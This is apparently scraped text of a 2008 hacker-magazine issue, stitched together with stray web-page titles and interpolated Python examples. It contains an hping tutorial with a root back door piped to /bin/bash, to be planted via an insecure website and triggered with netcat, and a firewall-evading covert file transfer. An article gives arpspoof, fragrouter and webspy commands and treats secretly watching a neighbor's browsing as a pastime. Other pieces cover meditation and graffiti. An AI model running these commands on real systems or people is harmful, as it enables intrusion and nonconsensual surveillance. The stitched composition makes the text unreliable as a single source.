        0x0000:  4500 0014 203b 0000 4029 5c84 7f00 0001  E....;..@)\.....
        0x0010:  7f00 0001
    13:33:09.025631 00:00:00:00:00:00 > 00:00:00:00:00:00, ethertype IPv4 (0x0800), length 34: (tos 0x0, ttl 64, id 41944, offset 0, flags [none], proto IPv6 (41), length 20) 127.0.0.1 > 127.0.0.1: [|ip6]
        0x0000:  4500 0014 a3d8 0000 4029 d8e6 7f00 0001  E.......@)......
        0x0010:  7f00 0001
    13:33:10.026089 00:00:00:00:00:00 > 00:00:00:00:00:00, ethertype IPv4 (0x0800), length 34: (tos 0x0, ttl 64, id 18791, offset 0, flags [none], proto IPv6 (41), length 20) 127.0.0.1 > 127.0.0.1: [|ip6]
        0x0000:  4500 0014 4967 0000 4029 3358 7f00 0001  E...Ig..@)3X....
        0x0010:  7f00 0001

Each captured packet is exactly the 20-byte IPv4 header (length 20, protocol 41) with nothing after it, which is what "-0 -H 41" with no data asks for.

The last of the basics I'm going to talk about is the ability to specify your source address (the -a option). This is excellent for testing anti-spoofing features of your firewall or to perform "idle" scans. I leave that as a project for you to figure out on your own. Remember that any replies go to the spoofed address, not to you, so you look for them with tcpdump somewhere on the path rather than in HPing's own output.

Now that you know how to craft basic packets with HPing, you may start to wonder why you would use this for anything except port scans or security-related measures. Imagine that you work for a managed service provider and that you need to monitor both system health and service health. You can incorporate HPing into your service health monitoring by setting up a basic script which will craft packets, send them to the service in question, deliver a payload if needed, and then report back to your management station whether or not the service is up, depending on the response received by HPing.
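As an added example of the monitoring script just described (my code, not the article's and not part of hping), here is the decision logic such a script needs: classify_reply turns the output of one hping2 SYN probe into the state a management station wants (open, closed or filtered), and check_services runs a list of host:port checks through it. Only probe_with_hping needs hping2 on the PATH and root for raw sockets; the hostnames, ports and the sample output strings are constructed in hping2's format so the classifier can be run offline.

```python
import re
import subprocess
from typing import Callable, Dict, List, Tuple

# hping2 prints one line per reply, e.g.
#   len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=0 win=32792 rtt=0.2 ms
# and, when nothing answered, a summary such as "1 packets transmitted, 0 packets received, 100% packet loss".
FLAGS_RE = re.compile(r"\bflags=([A-Z]*)")
LOSS_RE = re.compile(r"(\d+)% packet loss")


def classify_reply(hping_output: str) -> str:
    """Map the output of one hping2 -S probe to a port state.

    SYN/ACK back   -> "open"     (the handshake would complete)
    RST(/ACK) back -> "closed"   (host up, nothing listening, or actively rejected)
    no reply       -> "filtered" (dropped on the way, or host down)
    """
    for flags in FLAGS_RE.findall(hping_output):
        if "S" in flags and "A" in flags:
            return "open"
        if "R" in flags:
            return "closed"
        return "other:" + flags
    if LOSS_RE.search(hping_output):
        return "filtered"      # hping ran, and every probe went unanswered
    return "unknown"           # no reply lines and no statistics: hping did not run properly


def probe_with_hping(host: str, port: int, count: int = 1, timeout: float = 5.0) -> str:
    """Run a real SYN probe. Needs hping2 on PATH and root (raw sockets)."""
    cmd = ["hping2", host, "-S", "-p", str(port), "-c", str(count)]
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return "error"
    # hping2 may send its banner and statistics to stderr; scan both streams.
    return classify_reply(proc.stdout + proc.stderr)


def check_services(targets: List[Tuple[str, int]],
                   probe: Callable[[str, int], str] = probe_with_hping) -> Dict[str, str]:
    """Probe every host:port and return {"host:port": state}, ready to report upstream."""
    return {f"{host}:{port}": probe(host, port) for host, port in targets}


# Constructed sample output in hping2's format (not captured from a real run).
SAMPLE_OUTPUT = {
    ("web.example.test", 80):
        "HPING web.example.test (eth0 10.20.30.5): S set, 40 headers + 0 data bytes\n"
        "len=44 ip=10.20.30.5 ttl=64 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.4 ms\n",
    ("web.example.test", 8080):
        "len=40 ip=10.20.30.5 ttl=64 DF id=0 sport=8080 flags=RA seq=0 win=0 rtt=0.3 ms\n",
    ("db.example.test", 3306):
        "--- db.example.test hping statistic ---\n"
        "1 packets transmitted, 0 packets received, 100% packet loss\n",
}


def fake_probe(host: str, port: int) -> str:
    """Stand-in for probe_with_hping that classifies the constructed samples."""
    return classify_reply(SAMPLE_OUTPUT.get((host, port), ""))


if __name__ == "__main__":
    for name, state in check_services(list(SAMPLE_OUTPUT), probe=fake_probe).items():
        print(f"{name:28s} {state}")
```

Swap fake_probe for the default probe_with_hping to monitor real hosts; a "closed" result from a host that should be serving is as much an alert as "filtered", so report the state rather than collapsing it to up/down.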
Advanced Features

One of HPing's nice features is the ability to transfer files across a "ping" session. I've only done this with text files, but I'm sure that someone out there knows how to successfully transfer a binary file like an image. Suppose you have a text file that you need to transfer, but all the normal file transfer options like FTP(S), SFTP/SCP, and HTTP(S) are blocked by a firewall; however, ICMP is allowed out. You can use HPing to transfer the file across ICMP. First you will have to set your target server to be in a listen state:

    [root@doormouse ~]# hping2 localhost --listen signature --safe --icmp
    Warning: Unable to guess the output interface
    hping2 listen mode
    [main] memlockall(): Success
    Warning: can't disable memory paging!

Now that we have someone listening, let's transfer the file from our source machine:

    [root@doormouse temp]# hping2 localhost --icmp -d 100 --sign signature --file ./random.stuff
    HPING localhost (lo 127.0.0.1): icmp mode set, 28 headers + 100 data bytes
    [main] memlockall(): Success
    Warning: can't disable memory paging!
    len=128 ip=127.0.0.1 ttl=64 id=12770 icmp_seq=0 rtt=0.3 ms
    len=128 ip=127.0.0.1 ttl=64 id=12773 icmp_seq=1 rtt=0.1 ms
    len=128 ip=127.0.0.1 ttl=64 id=12775 icmp_seq=2 rtt=0.2 ms
    len=128 ip=127.0.0.1 ttl=64 id=12777 icmp_seq=3 rtt=0.2 ms
    --- localhost hping statistic ---
    4 packets transmitted, 4 packets received, 0% packet loss
    round-trip min/avg/max = 0.1/0.2/0.3 ms

The listening side will then show:

    hping2 listen mode
    [main] memlockall(): Success
    Warning: can't disable memory paging!
    Line 1
    Line 2
    Line 3
    Line 4
    End of Important File

Looks like we managed to transfer our important file successfully! What makes this work: --sign puts the string "signature" at the front of the data in every packet, and the listener sniffs every packet it sees, looks for that string and prints whatever follows it; --safe makes the sender resend packets the listener did not acknowledge. Most people won't sit and examine ICMP logs, so you may be able to evade any firewall or IPS in the way. That holds only for devices that pass ICMP without looking inside it: an IPS with a content rule sees the keyword and the file text in the clear, exactly as the listener does.

Let's examine the same scenario, except the location you are at only allows CUPS outbound and does deep packet inspection, so you can't re-bind your FTP or SFTP server to that port. I know this is far-fetched, but work with me on this one. You can transfer the file to your server over CUPS without interfering with the running CUPS server on the remote end:

    [root@doormouse ~]# netstat -na | grep LIST | grep 631
    tcp        0      0 127.0.0.1:631          0.0.0.0:*              LISTEN
    [root@doormouse ~]# hping2 localhost --listen signature --safe -p 631
    Warning: Unable to guess the output interface
    hping2 listen mode
    [main] memlockall(): Success
    Warning: can't disable memory paging!
    Line 1
    Line 2
    Line 3
    Line 4
    End of Important File

The command to send the file over TCP with no flags looks like this:

    [root@doormouse temp]# hping2 localhost -p 631 -d 100 --sign signature --file ./random.stuff
    HPING localhost (lo 127.0.0.1): NO FLAGS are set, 40 headers + 100 data bytes
    [main] memlockall(): Success
    Warning: can't disable memory paging!
    len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=631 flags=RA seq=0 win=0 rtt=0.0 ms

CUPS is not disturbed because a segment with no flags set belongs to no connection and starts none: the kernel's TCP never hands it to the listening socket, and the flags=RA line is the stack rejecting it, not cupsd answering. HPing's listener reads the raw packets off the interface, so it still sees the data.

Keep in mind that files transferred this way are not encrypted. Although most people won't be inspecting packets that much, anyone snooping on the wire can grab your information.
You can also use HPing as a back door. Get the following command running on a remote host, possibly through an insecure website with an unchecked input variable: hping2 -I eth0 --listen signature -p 80 | /bin/bash. Then, use netcat to do something like this: echo "signature reboot;" | nc 333.444.555.666 80 (that address is a placeholder, not a valid IP; put the listener's real address there). Anything after the word "signature" in the echo command will be processed by the /bin/bash to which HPing's output is being piped, and so the server reboots. Try this with your own machines: use signature touch remote.touched.file; to see that the listener will process what is being asked of it. You won't see anything on the console, but when you stop HPing and do a quick ls, you should now see a new file called remote.touched.file in the current directory. Note what the listener does not check: anyone who can reach port 80 and knows the cleartext keyword gets a root shell, and the keyword travels unencrypted in every packet.

Another use for this technique is as a "port knocker." If you don't want to leave your SSH daemon up and running all the time, set up HPing on your SSH server. Whenever you want to start your SSH daemon, use the command signature service sshd start;.
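To make concrete what the --sign/--listen pair does on the wire, for both the ICMP file transfer above and the "signature reboot;" back door, here is an added example in plain Python; it is my code, neither the article's nor hping's source. The sender puts the signature string at the front of each packet's data and the listener prints whatever follows it, so the same mechanism carries a file or a shell command. Packets are built and parsed as bytes, so no raw socket or root is needed. Assumed, not taken from the article or hping: zero padding of short chunks, no --safe retransmission, and the constructed file text.

```python
import struct
from typing import Iterable, Iterator

SIGNATURE = b"signature"   # the --sign / --listen keyword used in the article
DATA_SIZE = 100            # the article's -d 100


def inet_checksum(data: bytes) -> int:
    """RFC 1071 ones-complement sum, as used for ICMP headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp_echo(payload: bytes, ident: int = 0x1234, seq: int = 0) -> bytes:
    """ICMP echo request (type 8, code 0) carrying payload, checksum filled in."""
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    csum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + payload


def sign_chunks(data: bytes, signature: bytes = SIGNATURE,
                size: int = DATA_SIZE) -> Iterator[bytes]:
    """Sender side (--icmp -d size --sign --file): signature + file bytes in each packet.
    Short chunks are zero padded to -d bytes (an assumption of this model)."""
    room = size - len(signature)
    if room <= 0:
        raise ValueError("-d must leave room after the signature")
    for seq, off in enumerate(range(0, len(data), room)):
        payload = (signature + data[off:off + room]).ljust(size, b"\x00")
        yield build_icmp_echo(payload, seq=seq)


def listen_extract(packet: bytes, signature: bytes = SIGNATURE) -> bytes:
    """Listener side (--listen signature): ignore packets with a bad checksum,
    find the signature anywhere in the data and return the bytes after it."""
    if len(packet) < 8 or inet_checksum(packet) != 0:
        return b""
    data = packet[8:]
    idx = data.find(signature)
    if idx < 0:
        return b""
    return data[idx + len(signature):].rstrip(b"\x00")


def receive_file(packets: Iterable[bytes]) -> bytes:
    """Concatenate what the listener prints for each packet, in arrival order."""
    return b"".join(listen_extract(p) for p in packets)


def backdoor_command(packet: bytes) -> str:
    """What 'hping2 --listen signature | /bin/bash' would hand to the shell."""
    return listen_extract(packet).decode("ascii", "replace").strip()


def ids_match(packet: bytes, signature: bytes = SIGNATURE) -> bool:
    """The content match an IPS rule makes: the keyword is in the clear in every packet."""
    return signature in packet


# Constructed sample file; the article's listener printed exactly these lines.
SAMPLE_FILE = b"Line 1\nLine 2\nLine 3\nLine 4\nEnd of Important File\n"

if __name__ == "__main__":
    wire = list(sign_chunks(SAMPLE_FILE))
    print(f"{len(wire)} packet(s) of {len(wire[0])} bytes; listener output:")
    print(receive_file(wire).decode(), end="")
    cmd = build_icmp_echo(b"signature reboot;")
    print("shell would run:", backdoor_command(cmd), "| IPS content match:", ids_match(cmd))
```

Stripping the padding on receipt is what this model does with the unused tail of each packet; it also eats any NUL bytes at the end of a chunk, which is the kind of thing that breaks a binary transfer while text files go through cleanly. ids_match is the point to take away about evasion: the only secret here is the keyword, and it is visible to anything that inspects payloads.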
Conclusion

As you can see, HPing is a great tool for both basic and more advanced applications, and it can be used in a variety of different ways. It's excellent for helping people to learn how the IP stack works, especially the TCP flag settings, and it's great to use in or along with custom applications. The topics I've covered here in this article are just the beginning, and I strongly urge you to become familiar with this powerful tool.

Shouts: magikh0e, Ihab, Exial, JohnPNP and, of course, eXoDuS. (YNBABWARL!)
by Sai Emrys
2600@saizai.com
AIM, #ca2600: saizai
GPG: 0xAFF1F292

My experience has been that meditation is a subject that frequently polarizes people: some believe credulously in all kinds of unsupported nonsense, while some reject everything wholesale in the name of skepticism.

However, meditation is a useful way to hack your mind state. Rather than just taking some guru's preferred version of one technique as the One True Way, you just have to get to know a variety of the techniques available, tweak them to work for your own world-view and symbol set, and understand what about them makes them actually work.

I've talked with a fair number of people about this, and one misconception that comes up often is that "meditation" exclusively means "sitting in a dark, quiet room in lotus position smelling incense and thinking about nothing." This is indeed one method of meditation, known as mushin or "empty mind." It is far from the only one, though, and it's not necessarily the best first approach for everyone, especially not for people used to multitasking, like most hackers.

Another misconception is that meditation is to be treated as something that you do only in special short periods of time. This implies that most of the time you are not in a meditative mind state, but the whole point of meditation is to change your everyday life.

There certainly is a place for separate, focused meditation, but here is one class of methods I call "all-point" techniques. What makes this class of methods work is the combination of a very rich environment and the strategy of not concentrating overly on any particular piece of it. These methods are particularly well-suited to beginning one's meditation experience and to easy, everyday practice.

1. "Soft eyes"

This is a relatively common technique in martial arts.

Instead of focusing on the eyes or hands of the person you are talking with (or trying to disarm), aim your eyes towards the neck area and keep a soft focus, both mentally and literally.

A good way to check this technique is to ask yourself a series of questions:

• Where is their right hand and what are they holding?
• What is in their pockets? (Pants, chest, under-arm holster, buttocks...)
• How tense are the muscles around and above their eyes? Shoulders? Neck?
• How fast are they breathing?
• How are they about to move?
• Who and what is nearby? Where is the nearest exit?

The way to tell whether you're doing this right is to see if you can answer all of these questions with only minimal, if any, movement of your eyes and attention; you should be able to see all of it simultaneously.

This is not an exclusively martial technique, though it's certainly useful for that; try just doing it with everyone you see. The point is to be able to notice as much as possible, without telegraphing what you are looking at and without having your attention exclusively focused on one thing. Magicians and fighters both like it when they can use misdirection to make you not notice things which are within your sight.

2. Really enjoying nature

Go somewhere you'll find beautiful. I'll use hills as an example since that's what I most enjoy, but anything vibrant will work.

Normally, when most people go to "enjoy nature," they either barely notice it at all because they're distracted by equipment, their latest argument, planning the next day's work, etc.; they notice one spotlighted bit at a time; or they notice only a very vague ambiance.

Instead, try to individually see everything in detail.

An easy way to do this is to start by limiting your attention to two things; for example, feeling wind on your skin and seeing the clouds move. See as much detail as you can in those two things. Then add a third, such as the feel of sunlight or the movement of a patch of grass nearby.

The key lies in adding more things to your attention simultaneously without losing detail in the previously perceived ones. This can very quickly become overwhelming; the amount of information in any natural scene is extremely dense. Even a small patch of grass will have enough movement and detail in it to swamp your multithreading.

Fortunately, this is a learnable skill. With practice, you'll find that your effective threadcount and buffer size go up.

As a nice bonus, the more you can really notice, the more enjoyable it is.

3. Individuals in crowds

What did you notice the last time you walked down the street?

It's interesting that the amount you relate to people as individuals tends to be inversely related to the number of people present. Crowds gain a separate character of their own: it's easier to simply interpret them as a mass. This is also true in reverse; being a member of a crowd makes one less apt to empathize with others as individuals. Look up the case of Kitty Genovese for one sad example.

Next time you are out, try to notice faces, body posture, and the distances people stand from each other, rather than glazing over. Don't attach too much to each personal drama; just notice, recognize, and keep moving.

The goal for this is to increase the scope of things which you can take in consciously, making a "mere" walk down the street a somewhat more alive experience. For more on recognizing facial emotions, I highly recommend the work of Paul Ekman, and for more on the significance of proximity in human interaction, I recommend The Hidden Dimension and The Silent Language, both by Edward T. Hall.

Conclusion

There are many other situations in which you can practice this "all-point" technique: while playing RTSs and other games with lots of things happening at once; while listening to complex multi-part music such as Rachmaninoff, Bach, or Godspeed You! Black Emperor; while noticing all the background sounds wherever you are, including computer fans, hard drive clicks, traffic, your own breathing, radios, neighbors, and so on; or while experiencing any environment.

The purpose of this class of techniques is to learn to be able to deal with highly multithreaded, content-rich, real-time situations in a serene manner, so you can not only experience as much of these situations as possible but also do so without being overwhelmed. This is a lot like the eventual purpose of traditional empty-mind meditation; it's just a different approach. I've given just a few ways of doing this. It's up to you to figure out one that'll be effective for you in your daily life. The more that you can integrate this way of interacting with the world as a daily habit, the more effective it'll be at shifting your baseline mind state.

If you have any feedback on this or are interested in seeing more, please contact me. I'm working on a book tentatively entitled A Hacker's Guide to Meditation: Practical Recipes Without the Dogma, which aims to be a complete guide to all known classes of effective meditation techniques (of which this article discusses just one) from a pragmatic, open-source perspective. This includes techniques traditionally taught as meditation, psychotherapy, and more. If you find this useful, or if you have a technique or variant I might not have heard of, I'd like to know.

Happy mind-hacking!

Sai Emrys is a recent graduate of UC Berkeley in cognitive science, looking to do doctoral work in the neuroscience of empathy. Other interests include running the Language Creation Conference (conlangs.berkeley.edu), interpreting music in American Sign Language (YouTube saizai), coding in Ruby on Rails, and consulting on international business.
by Uriah C.

I enjoy leaving my wireless access point available for others to connect to and use the Internet. There is one catch, however: I get to play and monitor the traffic whenever I want to. In this article, I will describe a pastime that is fun and revealing of your neighbors.

I recently found a new host on my network to play with. New friends are fun! I frequently use EtherApe to quickly monitor my network traffic, and I found a new computer name on my network. Knowing that this person was on my network, I fired up nmap to do a quick ping sweep to confirm my new friend. My new friend's computer name was her real name, and I could see that she had the IP address of 192.168.1.104. The family computer was on 192.168.1.103, my laptop was on 192.168.1.101, and the access point was on 192.168.1.1.

Since I had a new friend to play with, I decided to view the traffic that was going through. Of course I could do that with EtherApe, but I wanted more than just IP addresses and URLs. Besides, I was itching to use the program webspy for a little bit.

Before I go into the fun too much, let me explain what webspy is. Webspy is a program that is part of Doug Song's dsniff suite. These tools are designed to penetration test your network, and, in my case, have fun with those on my network. I must stress that this should only be done on your own network or on one that you have been given permission to perform such tests on. Now that the legal stuff is out of the way, let's get on with the fun.

The first thing I have to do is to ARP poison the host and the gateway. This way, the traffic will be routed to my computer. This is done by opening two terminal windows.

In the first terminal, type:

    # arpspoof -i eth1 -t 192.168.1.1 192.168.1.104

In the second terminal, type:

    # arpspoof -i eth1 -t 192.168.1.104 192.168.1.1

Then, I need to make sure that I am forwarding traffic to the proper locations, so I use fragrouter. In a third terminal, type:

    # fragrouter -i eth1 -B1
Now let's see what this does. The first arpspoof command sends forged ARP replies over the interface (-i) eth1 to the target (-t) 192.168.1.1, telling it that 192.168.1.104 is at my computer's MAC address, while the second terminal tells the target 192.168.1.104 that 192.168.1.1 is at my MAC address. Both hosts now hand each other's traffic to me. Meanwhile, fragrouter in its baseline mode (-B1 is plain IP forwarding, with none of the fragmentation tricks its other modes apply) passes everything that has come in on to its real destination, so there is no interruption of service. Turning on the kernel's own IP forwarding would serve the same purpose; the essential part is that something forwards what the two victims now send to you. When you stop arpspoof with Ctrl-C, it sends the correct mappings back out so the hosts' ARP caches recover.
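As an added example (my code, not the article's commands and not dsniff's source) of what the two arpspoof terminals put on the wire, and of the check that catches them: build_arp_reply makes the forged reply that "arpspoof -t 192.168.1.1 192.168.1.104" sends to the gateway (192.168.1.104 is-at my MAC) and its mirror image sent to the victim, and ArpWatch keeps the IP-to-MAC bindings it has seen and reports any that change. The IPs are the article's; every MAC address is made up for the example.

```python
import socket
import struct
from typing import Dict, List, Optional

ETH_P_ARP = 0x0806
ARP_REPLY = 2

GATEWAY_IP, VICTIM_IP = "192.168.1.1", "192.168.1.104"
GATEWAY_MAC = "00:11:22:aa:00:01"    # constructed
VICTIM_MAC = "00:11:22:aa:01:04"     # constructed
ATTACKER_MAC = "00:11:22:ee:ee:ee"   # constructed: the laptop running arpspoof


def _mac(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def build_arp_reply(sender_ip: str, sender_mac: str,
                    target_ip: str, target_mac: str) -> bytes:
    """Ethernet frame + ARP reply asserting 'sender_ip is-at sender_mac', unicast to target."""
    eth = _mac(target_mac) + _mac(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # Ethernet, IPv4, hlen 6, plen 4
    arp += _mac(sender_mac) + socket.inet_aton(sender_ip)
    arp += _mac(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def parse_arp(frame: bytes) -> Optional[Dict[str, object]]:
    """Pull the binding an ARP frame asserts; None if the frame is not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    return {
        "opcode": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": ":".join(f"{b:02x}" for b in frame[22:28]),
        "sender_ip": socket.inet_ntoa(frame[28:32]),
        "target_ip": socket.inet_ntoa(frame[38:42]),
    }


def arpspoof_frames() -> List[bytes]:
    """The two forged replies the article's terminals send (arpspoof repeats them every few seconds)."""
    return [
        # terminal 1: -t 192.168.1.1 192.168.1.104 -> tell the gateway the victim is at me
        build_arp_reply(VICTIM_IP, ATTACKER_MAC, GATEWAY_IP, GATEWAY_MAC),
        # terminal 2: -t 192.168.1.104 192.168.1.1 -> tell the victim the gateway is at me
        build_arp_reply(GATEWAY_IP, ATTACKER_MAC, VICTIM_IP, VICTIM_MAC),
    ]


class ArpWatch:
    """Defender side: remember which MAC claimed each IP and flag a change."""

    def __init__(self) -> None:
        self.bindings: Dict[str, str] = {}
        self.alerts: List[str] = []

    def observe(self, frame: bytes) -> None:
        p = parse_arp(frame)
        if p is None or p["opcode"] != ARP_REPLY:
            return
        ip, mac = p["sender_ip"], p["sender_mac"]
        known = self.bindings.get(ip)
        if known is not None and known != mac:
            self.alerts.append(f"{ip} moved from {known} to {mac}")
        self.bindings[ip] = mac


def run_scenario() -> List[str]:
    """Legitimate replies are seen first, then the spoof; returns the alerts raised."""
    watch = ArpWatch()
    watch.observe(build_arp_reply(GATEWAY_IP, GATEWAY_MAC, VICTIM_IP, VICTIM_MAC))
    watch.observe(build_arp_reply(VICTIM_IP, VICTIM_MAC, GATEWAY_IP, GATEWAY_MAC))
    for frame in arpspoof_frames():
        watch.observe(frame)
    return watch.alerts


if __name__ == "__main__":
    for alert in run_scenario():
        print("ALERT:", alert)
```

On a real network you would feed observe() from an AF_PACKET socket bound to the interface; the detection is the same one arpwatch performs, and it only needs the first legitimate reply to have been seen before the spoof starts.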
Now, it's time for the last few steps. I need to run webspy and open a browser. Then, I can have the fun of seeing whatever someone else sees. So, I would open up two more terminals. In the fourth terminal, type:

    # webspy -i eth1 192.168.1.104

And, finally, in the fifth terminal, type:

    # firefox &

Now, Firefox opens up, and I get to see the websites that my new friend opens up in real time. I've only seen one problem: if an ad pops up on a separate page from the rest of a website, it'll be shown separately from the rest of the original site. So, if my friend goes to MySpace, then I see MySpace, but it quickly flashes over to show just the ad without the rest of the site. I have my browser set to open these ads in different tabs, so I can see the page and the ad.

You never know what kind of sites others may visit, so you should do this with discretion, especially if the kids are running around the house and the material coming up is questionable.
by scOut64
scOut64@yahoo.ca

I find that one of my longest-running fascinations, computer hacking, has a lot to do with my greatest passion and hobby, graffiti art. These are two very controversial subjects, and discussing them can usually generate a great response, depending on who you ask. This is not a how-to article by any means, but rather a way to shed some light on the similarities between two of my favorite pastimes. But I'll still include the standard disclaimer that getting caught participating in either of these activities might get you in trouble.

The first thing I can find these two subjects have in common is the reaction that you get when you tell someone that you do one or the other. If you tell someone you're a computer hacker, you can usually expect confused or wary looks. People assume that you've done shady things before, and they approach conversation choosing their words carefully, assuming that you might take some of the information and use it against them. They might not be aware that the hacking you do might be completely legal. You might be a pen tester for a security firm, or you just might like running wargames on your network with your friends. It depends on your definition of a hacker.

Similarly, when you tell someone that you're a graffiti artist, some people automatically assume that you're a vandal. They think you're one of those stereotypical guys who tags up convenience stores at night, or that you're one of the people who vandalized all those New York City trains years ago. They might think that your bedroom is a mess and that all your schoolbooks are scribbled on. They may not realize that there are plenty of legal areas to tag up and that what you do falls completely within the law, or that you might be a graphic design student whose style is completely digital. It depends on your definition of graffiti.

Another similarity between these two areas is legality. Graffiti writing really came into popularity in the 70s and 80s in New York City. Yes, it caused all kinds of chaos, and many people were penalized once the city implemented graffiti laws. Like many great things, because it was new and brought change, people didn't like it. Likewise, when hacking started becoming extremely popular, there were no laws or governing bodies to regulate what went on. With these two cultures and many others, once the government felt things got a little too out of control, they stepped in and "supervised."

There are a number of other similarities between the two fields:

• Some ways of participating in these activities are illegal and carry penalties of various kinds.
• You need permission for participation to be legal. You can't just 0wn your friend's b0x any more than you can tag up his room; you need to have an OK from him first.
• There are contests. These are great for intellectual stimulation, learning, meeting new people, and challenging yourself.
• There are a lot of graffiti-based themes in computer hacking and in video games. Clan tags and sigs have gotten very, very cool.
• Depending on who you ask, both can be considered either vandalism and crime or art and expression.
• An interest in either field can lead to a great career.
• Sometimes, both practices involve going places you're not supposed to go.
• Sometimes, you have to come back to the same places to finish what you started.

There are more similarities, but you get the idea. Graffiti and hacking have evolved into distinct cultures; just like every culture, you have good people and bad people. People come and go, but the culture survives. Legal or not, these activities will still go on. The question still remains: how will you represent your culture?

Shouts: Adict, Kiwi, www.worldwideblackbookproject.com
2600 v25 n2 (summer 2008)
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 

2600 v25 n2 (summer 2008)

The Best of Times

History is something that we're always living but rarely appreciating. This year, all of that changed for us. We got the incredible opportunity to truly acknowledge the significance of the changing trends and technologies that we have been witnessing since 1984. And now we're ready to share what came out of it all.

We're happy to announce the publication of our first-ever book: The Best of 2600: A Hacker Odyssey. When we were first approached with the idea for this project, it seemed a daunting task. And it was. After all, how could we possibly pick and choose from 24 years of publishing? And how would such a collection be ordered? The almost infinite amount of themes and subject matter we've gone through in so many issues made this seem like something we could never pull off.

So our biggest challenge was getting this massive amount of articles into some sort of order. After much brainstorming, we found the answer to be staring us in the face the whole time. What we've witnessed throughout all of our pages spans three very distinct decades: the 1980s, the 1990s, and the post-2000 period. And that is how we decided to divide the book. By decade. In so doing we quickly discovered that there was a very noticeable change of mood and tone when looking at such periods as cohesive units and then comparing them to each other.

For example, the 1980s was filled with a sense of wonder as so many new things were starting to come into play. The Bell System was being torn apart. Computers were becoming more and more popular and being found increasingly in the home. Hackers were among the first to figure it all out, finding ways of shaping the technology to their needs, and, naturally, getting into a load of trouble for their efforts. But there was still this link to the past, where mainframes dominated and phone phreaks lived in fear of arousing the ire of Ma Bell.

The 1990s was a period of growth where both telecommunications and the concept of the Internet soared into the stratosphere. Suddenly, everyone seemed to be following this stuff and the hacker world felt the effects in both good and bad ways. Having more people getting involved was certainly nice. But all of the attention was a royal pain in the ass. Hackers had always been looked upon with suspicion and paranoia but now it had graduated to genuine fear and the desire to put certain offenders behind bars. We saw that happen too many times. The dot-com boom turned many of our friends into very rich people and that tended to put all sorts of values on a collision course. And of course, this was the decade that the media really jumped into the fray. There were books and movies about hackers galore. Again, a bit of fun and a bit of a pain.

Then came 2000 and beyond. The world in this period seems to have gotten so much more serious. Everyone appears obsessed with security and convinced that everyone else is out to get them in one way or another, whether it be by stealing their identity or blowing them to smithereens. The net has become a fixture in our daily routines, speed and storage just keep increasing on a continual basis, and communicating has never been easier. But somehow, the innocence of our past seems to have been diminished. To many, the simple romance of playing with new technological toys is noticeably lacking and technology has become more of an assumed fact of our everyday lives. It's actually become easier for many of us to stay connected than to try

Page 4 -------------------- 2600 Magazine
and disconnect. In each of these distinct periods, we found there to be one remaining constant. The hacker culture has remained true to its beliefs and largely unaffected by the changing world around us. If you look at one of our articles from our early days and compare it to something from this issue, you'll notice that, while the technology is completely different, the spirit behind the writing has more or less remained the same. It's always about asking questions, performing all sorts of experiments, theorizing, and, above all else, sharing the results with the rest of us. Throughout all of the change and turmoil, this much has remained.

Once we realized that we had these three unique decades and a common thread that ran between them, it was just a matter of picking the stories that best summed up what was going on at the time. As it turned out, this was another daunting task. There were just so many fascinating pieces that have gone into our pages over the years that it became painful to decide which ones would be included and which would have to be left out. And even after we had done a whole lot of cutting and trimming, it was all too clear that we just had an overabundance of material. Trying to fit it into a 360 page book would be next to impossible. In fact, just the 1980s could have easily filled the entire page allocation if we had let it. Fortunately, our publishers had the good sense to lobby for a dramatic increase in size for the book and we found ourselves with a limit that was over 600 pages instead. As the months went on, this wound up being increased once more to nearly 900 pages! Apparently, the publishers had just as difficult a time figuring out what to cut as we did. What better endorsement could we possibly ask for?

In the end, we wound up with a pretty neat collection of some of what's been going on in the hacker world in the last quarter century. While it's titled The Best of 2600, there are still lots of good pieces that didn't make it in for one reason or another. But we believe that if you look at all of the pieces that are included, you'll get a pretty good sense of what's been happening in our unique world since our first issue in 1984. (In fact, the very first article in our very first issue ended with the sentence: "Turn the page and become a part of our unique world.")

We want to thank the many readers who have been suggesting something like this for years. We do listen to these suggestions and we're happy that the opportunity presented itself where we could actually bring these ideas to fruition. We also want to thank Wiley Publishing and the many people over there who have worked with us on this project since it began last year. We now have something which can make a good deal of our material a lot more accessible, not only to our existing readers but to a vast number of others who have never even heard of 2600 and whose only perception of what hackers are about comes from the mass media. This is a tremendous opportunity to have our voices heard in a whole new arena and to open some doors in what others only see as walls.

And for many of us, this will be an amazing trip down Memory Lane. We tend to forget all of the magic of the past and the significance of the differences in the way things used to work, both big things and little things. An era when something like Caller ID was seen as extremely controversial, when packet switched networks were all the rage, when pagers were far more prevalent than cellular phones, when sending electronic mail between different computer systems was a really big deal. It's one thing to simply remember those days, quite another to immerse yourself in the words and emotions of the time period. What's most amazing to us is how relevant it all is, even when the technology is almost unrecognizable. And for those of you who weren't even alive back then, there is no better way to get a true sense of the history that we all know is out there somewhere.

The Best of 2600 will officially be released at The Last HOPE conference and will be available thereafter all over the world. We doubt there will ever be a book with this much information about the hacker world crammed into so many pages. But we certainly do hope to see a lot more hacker-related books and an overall increase in the interest level stemming from all of this. Because one thing we learned from going through every article we ever printed, apart from being utterly captivated by some of the stories, is that this stuff really does matter.

Summer 2008 -------------------- Page 5
Don't "Locate Me"
by Terry Stenvold
thebmxr@gmail.com

Disclaimer

